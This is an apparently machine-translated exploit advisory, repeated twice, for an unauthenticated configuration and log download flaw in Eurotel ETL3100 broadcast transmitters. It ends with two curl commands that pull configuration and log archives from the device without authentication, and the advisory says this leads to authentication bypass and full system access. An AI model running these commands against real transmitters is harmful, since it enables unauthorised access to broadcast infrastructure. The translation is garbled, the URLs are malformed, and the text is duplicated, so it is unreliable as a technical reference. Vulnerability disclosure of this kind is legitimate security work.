#利用标题: EUROTEL ETL3100-发射器未经身份验证的配置/日志下载
#利用作者:液态虫
Vendor: Eurotel S.P.A. | Siel,Sistemi Elettronici S.R.L
产品网页: https://www.eurotel.it | https://www.siel.fm
受影响的版本: V01C01(MicroproCessor: SOCS0T10/ATS01S01,Model: ETL3100兴奋剂)
V01X37(Microprocessor: SOCS08/SOCS08,Model: ETL3100RT激发仪)
摘要:电视广播应用的RF技术。
系列ETL3100无线电发射器提供了所有必要的
FM和DAB标准定义的功能。提供了两个乐队
轻松地以模拟和数字DAB标准抱怨。系列
ETL3100电视发射器提供了所有必要的功能
由DVB-T,DVB-H,DVB-T2,ATSC和ISDB-T标准定义,为
以及模拟电视标准。提供三个乐队可轻松
抱怨所有标准通道,然后从模拟-TV轻轻切换
“世界”到DVB-T/H,DVB-T2,ATSC或ISDB-T传输。
DESC:电视和FM发射器遭受了未经身份验证的
配置和日志下载漏洞。这将启用
攻击者披露敏感信息并帮助他
身份验证旁路,特权升级和完整的系统访问。
测试ON: GNU/Linux Ubuntu 3.0.0+(GCC 4.3.3)
LightTPD/1.4.26
PHP/5.4.3
Xilinx Virtex机器
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5784
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5784.php
29.04.2023
- -
$ curl 3http://192.168.2.166/cfg_download.php -o config.tgz
$ curl 3http://192.168.2.166/ixciter/log_download.php -o log.tar.gz
#利用作者:液态虫
Vendor: Eurotel S.P.A. | Siel,Sistemi Elettronici S.R.L
产品网页: https://www.eurotel.it | https://www.siel.fm
受影响的版本: V01C01(MicroproCessor: SOCS0T10/ATS01S01,Model: ETL3100兴奋剂)
V01X37(Microprocessor: SOCS08/SOCS08,Model: ETL3100RT激发仪)
摘要:电视广播应用的RF技术。
系列ETL3100无线电发射器提供了所有必要的
FM和DAB标准定义的功能。提供了两个乐队
轻松地以模拟和数字DAB标准抱怨。系列
ETL3100电视发射器提供了所有必要的功能
由DVB-T,DVB-H,DVB-T2,ATSC和ISDB-T标准定义,为
以及模拟电视标准。提供三个乐队可轻松
抱怨所有标准通道,然后从模拟-TV轻轻切换
“世界”到DVB-T/H,DVB-T2,ATSC或ISDB-T传输。
DESC:电视和FM发射器遭受了未经身份验证的
配置和日志下载漏洞。这将启用
攻击者披露敏感信息并帮助他
身份验证旁路,特权升级和完整的系统访问。
测试ON: GNU/Linux Ubuntu 3.0.0+(GCC 4.3.3)
LightTPD/1.4.26
PHP/5.4.3
Xilinx Virtex机器
gjoko“ liquidworm” krstic发现的脆弱性
@Zeroscience
咨询ID: ZSL-2023-5784
咨询URL: https://www.zeroscience.mk/en/vulnerabilities/zsl-2023-5784.php
29.04.2023
- -
$ curl 3http://192.168.2.166/cfg_download.php -o config.tgz
$ curl 3http://192.168.2.166/ixciter/log_download.php -o log.tar.gz